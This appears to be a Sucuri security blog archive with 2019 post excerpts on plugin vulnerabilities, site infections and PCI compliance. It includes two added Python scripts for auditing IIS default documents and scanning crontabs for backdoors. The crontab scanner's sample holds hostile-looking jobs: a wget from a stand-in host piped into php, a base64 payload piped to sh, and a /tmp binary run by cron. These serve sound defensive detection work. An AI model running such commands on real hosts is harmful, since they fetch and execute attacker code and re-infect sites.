- Free Website Security Consultation for GoDaddy Pros 10 May 2019
Sucuri is partnering with GoDaddy Pro to make the internet more secure, one website professional at a time. Developers, designers, agencies, and freelancers now have an exclusive avenue to level up security knowledge and differentiate their businesses from the competition.
GoDaddy Pro helps web developers and designers save time and money while managing multiple websites. The free membership includes extensive training materials, automation of routine maintenance tasks, and consolidated client management tools.
- Persistent XSS via CSRF in WP Meta and Date Remover 7 May 2019
During regular research audits for our Sucuri Firewall (WAF), we discovered a Cross-Site Request Forgery (CSRF) vulnerability leading to persistent Cross-Site Scripting (XSS), affecting 70,000+ users of the WP Meta and Date Remover plugin for WordPress.
Disclosure / Response Timeline:
- April 30 – Initial contact attempt
- May 07 – Patch is live
Are You at Risk?
Because the entry point is CSRF, exploiting this vulnerability requires some social engineering: a logged-in administrator has to be lured into loading an attacker-controlled page while their WordPress session is still active.
- Replica Spam on Poorly Maintained ASP Site 6 May 2019
Although the majority of sites we work on are powered by PHP, we still have clients whose sites use other programming languages.
The other day we cleaned an ASP site where we found a web.config file (the IIS counterpart of Apache's .htaccess) with these default-document entries:
<add value="view.asp" />
<add value="Default.asp" />
<add value="index.htm" />
<add value="index.html" />
<add value="iisstart.htm" />
<add value="default.aspx" />
<add value="index.asp" />
<add value="index.aspx" />
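A default-document list like the one above decides which file IIS serves for a bare directory request, so an unexpected name at the top of it is worth a closer look. The script below is an added example, not code from the Sucuri post: it parses a web.config, rebuilds the list the way IIS evaluates it (honouring clear and remove), flags entries outside the stock IIS defaults, and reports which file would be served first. The sample web.config is constructed for the demo; its add entries mirror the ones quoted above, with the surrounding elements assumed. Whether a flagged file is actually malicious still requires inspecting the file itself.

```python
"""Audit the default-document list in an IIS web.config (added example)."""
import xml.etree.ElementTree as ET

# Stock IIS default documents (compared case-insensitively). Anything else
# was added by an administrator, a deployment script, or an attacker.
IIS_DEFAULTS = frozenset({
    "default.htm", "default.asp", "index.htm",
    "index.html", "iisstart.htm", "default.aspx",
})

# Constructed sample: the <add> entries quoted in the post, wrapped in the
# assumed <defaultDocument>/<files> structure of a real web.config.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.webServer>
    <defaultDocument enabled="true">
      <files>
        <add value="view.asp" />
        <add value="Default.asp" />
        <add value="index.htm" />
        <add value="index.html" />
        <add value="iisstart.htm" />
        <add value="default.aspx" />
        <add value="index.asp" />
        <add value="index.aspx" />
      </files>
    </defaultDocument>
  </system.webServer>
</configuration>
"""


def default_documents(config_xml):
    """Return the ordered default-document list as IIS would evaluate it."""
    root = ET.fromstring(config_xml)
    docs = []
    for dd in root.iter("defaultDocument"):
        files = dd.find("files")
        if files is None:
            continue
        for child in files:
            if child.tag == "clear":
                docs = []                    # <clear /> drops inherited entries
            elif child.tag == "remove":
                value = child.get("value", "").lower()
                docs = [d for d in docs if d.lower() != value]
            elif child.tag == "add":
                docs.append(child.get("value", ""))
    return docs


def audit_default_documents(config_xml, allowed=IIS_DEFAULTS):
    """Flag non-standard entries and say which file '/' would resolve to."""
    docs = default_documents(config_xml)
    unexpected = [d for d in docs if d.lower() not in allowed]
    first = docs[0] if docs else None     # IIS serves the first existing match
    return {
        "documents": docs,
        "unexpected": unexpected,
        "served_first": first,
        "first_is_unexpected": first is not None and first.lower() not in allowed,
    }


if __name__ == "__main__":
    report = audit_default_documents(SAMPLE_WEB_CONFIG)
    for name in report["unexpected"]:
        print(f"non-standard default document: {name}")
    if report["first_is_unexpected"]:
        print(f"'{report['served_first']}' would be served for '/' - inspect it")
```

Run it against a site's own web.config by replacing the sample string; a legitimately added index.asp will also be flagged, so treat the output as a shortlist to check, not a verdict.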
- Cronjob Backdoors 3 May 2019
Attackers commonly rely on backdoors to regain entry easily and maintain control over a website. They also lean on PHP functions that extend a backdoor's reach.
shell_exec is a good example: it runs plain shell commands directly from the web application, giving the attacker far more control over the environment than PHP alone would.
Backdoor in Cron
While investigating a client with repeated website infections, we came across a scenario where a cron job was being used to reinfect the site.
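When a site keeps getting reinfected after a clean-up, the crontabs are one of the first places to look. The script below is an added example, not from the Sucuri post or the case it describes: it parses crontab text, skips comments and variable assignments, and flags jobs that show patterns typical of reinfection backdoors (a remote fetch piped into a shell or PHP, base64-decoded payloads, inline PHP execution, binaries run from /tmp-style directories). The crontab sample is constructed, and the indicator list is a starting point to tune per host, not a complete signature set.

```python
"""Scan crontab lines for reinfection-backdoor patterns (added example)."""
import re
import sys

# Constructed heuristics: (label, regex applied to the command part of a job).
INDICATORS = [
    ("remote fetch piped into an interpreter",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(?:(?:ba|da|z)?sh|php|perl|python3?)\b")),
    ("base64-decoded payload",
     re.compile(r"base64\s+(?:-d|--decode)\b|base64_decode\s*\(")),
    ("inline PHP code execution",
     re.compile(r"\bphp\s+-r\b|\beval\s*\(")),
    ("executing from a world-writable directory",
     re.compile(r"(?:^|[\s;|&])(?:/tmp|/var/tmp|/dev/shm)/\S+")),
    ("output discarded",   # normal housekeeping; only interesting alongside another hit
     re.compile(r">\s*/dev/null\s+2>&1")),
]

# Schedule is either @reboot/@daily style or five whitespace-separated fields.
CRON_LINE = re.compile(r"^\s*(?P<schedule>@\w+|(?:\S+\s+){4}\S+)\s+(?P<command>.+?)\s*$")

# Constructed sample crontab; the .invalid TLD is reserved and never resolves.
SAMPLE_CRONTAB = """\
MAILTO=""
# legitimate housekeeping
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /usr/bin/php /var/www/html/wp-cron.php >/dev/null 2>&1
# jobs that look like a reinfection mechanism
*/5 * * * * wget -q -O - http://example.invalid/x.txt | php >/dev/null 2>&1
@reboot echo Y2QgL3RtcA== | base64 -d | sh
* * * * * /tmp/.X11-unix/.sh > /dev/null 2>&1
"""


def parse_crontab(text):
    """Return [(schedule, command)] for job lines; skip comments and VAR=value."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group("schedule"), m.group("command")))
    return jobs


def scan_crontab(text):
    """Return [(schedule, command, [labels])] for jobs that match an indicator."""
    findings = []
    for schedule, command in parse_crontab(text):
        labels = [label for label, rx in INDICATORS if rx.search(command)]
        # Silencing output on its own is too common to report; require a stronger hit.
        if labels == ["output discarded"]:
            continue
        if labels:
            findings.append((schedule, command, labels))
    return findings


if __name__ == "__main__":
    # Pipe in `crontab -l -u <user>` or the contents of /etc/cron.d/* to scan a host.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CRONTAB
    for schedule, command, labels in scan_crontab(text):
        print(f"[{', '.join(labels)}] {schedule} {command}")
```

Check every user's crontab (including the web server's user) and the system locations (/etc/crontab, /etc/cron.d, /etc/cron.*), not just root's, since the job that reinfects a site usually runs as the account that can write the web root.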
- How Stolen Ecommerce Data is Sold on the Darknet 1 May 2019
We have recently published posts regarding banking malware and some of the ways it uses compromised websites to infect victim’s devices (smartphones, computers, POS terminals).
Now let us look into some of the methods that cybercriminals use to monetize stolen information like bank accounts, credit cards, and personal information.
Infected Ecommerce Website to Darknet Markets
It’s important to note that one of the most popular topics discussed among cybercriminals is their opsec (operations security).
- Insufficient Privilege Validation in WooCommerce Checkout Manager 29 April 2019
Due to the poor handling of a vulnerability disclosure, a new attack vector has appeared for the WooCommerce Checkout Manager WordPress plugin and is affecting over 60,000 sites. If you are using this plugin, we recommend that you update it to version 4.3 immediately.
As we’ve seen some exploit attempts occurring in the wild, we feel it is a good time to describe what the issue is.
Current State of the Vulnerability
This arbitrary file upload vulnerability was made public a few weeks ago and has recently been patched.
- Typo 3 Spam Infection 26 April 2019
Here at Sucuri most of the malware that we deal with is on CMS platforms like:
- and others.
But every now and then we come across something a little different.
Blackhat SEO Infection in Typo3
Just recently, I discovered a website using the Typo3 CMS that had been infected with a blackhat SEO spam infection:
Before I begin, according to websitesetup.org, Typo3 is currently the 8th most widely used CMS platform on the web, so I’m surprised I had never seen an infection with this software before, but it looks like over half a million websites on the web use Typo3.
- Plugins Added to Malicious Campaign 25 April 2019
We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.
Plugins Added to the Attack
- Download WP Inventory Manager (version <= 1.8.2)
- Woocommerce User Email Verification (version <= 3.3.0 **Still Not Fixed**)
Attackers are trying to exploit vulnerable versions of these plugins.
- Sucuri’s 10th Anniversary 24 April 2019
It feels like yesterday, but it has been 10 years since the domain sucuri.net was registered.
Happy 10th Birthday, Sucuri!
For us, 2009 marks the birth of the brand: it was the year the open-source project secured its name. The first Sucuri service was originally called NBIM (Network Based Integrity Monitoring).
Sucuri was intended to be an interface for the NBIM project. It allowed anyone to monitor websites for changes in content, WHOIS and DNS.
- Reset Email Account Passwords After a Website Malware Infection 22 April 2019
It’s not uncommon for bad actors to use compromised websites to send large amounts of email spam. This can cause major headaches for website owners — spam can lead to the blacklisting of a web host’s mail server IPs, or the domain name itself may be placed on blacklists like Spamhaus DBL.
Reset Email Passwords After a Website Hack
Blacklisting is problematic. It has serious consequences for a website’s reputation, may impact sales and revenue, and it can be a tedious process to remove a domain from a blacklist authority.
- PCI for SMB: Requirement 12 – Maintain an Information Security Policy 19 April 2019
Update: Read our new PCI Compliance guide.
Welcome to the final post in our series on understanding the Payment Card Industry Data Security Standard (PCI DSS). We want to show how PCI DSS affects anyone going through the compliance process using the PCI SAQs (Self-Assessment Questionnaires).
In the previous articles written about PCI, we covered the following:
- Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.